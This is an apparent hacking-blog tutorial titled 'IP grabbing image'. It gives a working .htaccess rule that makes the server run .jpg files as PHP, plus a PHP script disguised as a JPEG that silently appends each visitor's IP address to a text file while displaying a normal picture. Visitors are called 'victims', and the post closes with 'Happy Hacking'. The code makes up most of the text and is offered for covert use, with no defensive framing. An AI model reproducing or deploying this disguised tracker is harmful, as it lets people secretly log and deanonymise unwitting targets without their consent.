IP grabbing image:
Today I'm going to tell you guys about IP grabbing image.
In this tutorial we will learn how to grab IP using an image. The idea is to use .htaccess along with a php file and add .jpg files to php executable using htaccess. Here is the htaccess code which will add jpg as php executable.AddHandler application/x-httpd-php5 .jpg
Now make a GrabberMR47.jpg file with the below code.
<?php
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im = imagecreatefromjpeg("MR47.png");
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
The image grabbed your victims IP when He visited The Image
Chect IP_List.txt for IP :)
Happy Hacking
BY MR:47{XYBER SHEIKH}
No comments:
Post a Comment